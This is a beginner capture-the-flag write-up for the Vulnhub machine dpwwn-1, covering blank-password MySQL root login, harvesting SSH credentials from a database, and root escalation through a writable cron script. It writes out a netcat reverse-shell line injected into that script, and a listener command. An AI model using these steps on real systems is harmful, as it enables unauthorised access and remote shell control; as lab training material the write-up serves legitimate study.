Vulnhub - dpwwn-1 writeup
dpwwn: 1
Author: debashisace
Nmap
We can see that there is a SSH and HTTP service running. And other then that we have a MySql service running.
Since MySql is an unusal service weโll just start with that.
MySQL
We can try to connect to the mysql service but obviously we need username and password for that.
I first tried to login with random usernames and blank password.
Then I tried to use the common creds like admin:admin
or root:admin
or root:
and the last one worked i.e username - root
and blank password.
Since I was in the DB I started to look for anything interesting and I found a DB named SSH
๐๐. It had a table named users
๐๐, which had SSH creds. ๐๐
mistic:testP@$$swordmistic
Privilege escalation
Since we are in the system letโs just run the enumeration script and see if we can find anything good.
I didnโt find any SUID but I found a file named logrot.sh
in the home directory which was set to run in a cronjob as root
.
Since this file will be running as root in cron we can exploit it in multiple ways. We can send a reverse shell or we can add another user with root privs etc.
Simple method is to do echo "nc -e /bin/bash IP PORT" > logrot.sh
and then start a listner to get a reverse shell.
Now just start the listner with nc -nlvp PORT
and wait to get the shell.
And now get the flag
I am not sure what are these but there are some numbers attach to the flag in the end maybe they some extra task or something but I ainโt doing it. ๐๐
Thanks to @debashisace for this beginner level machine.
Thanks for reading, Feedback is always appreciated.
Follow me @0xmzfr for more โWriteupsโ.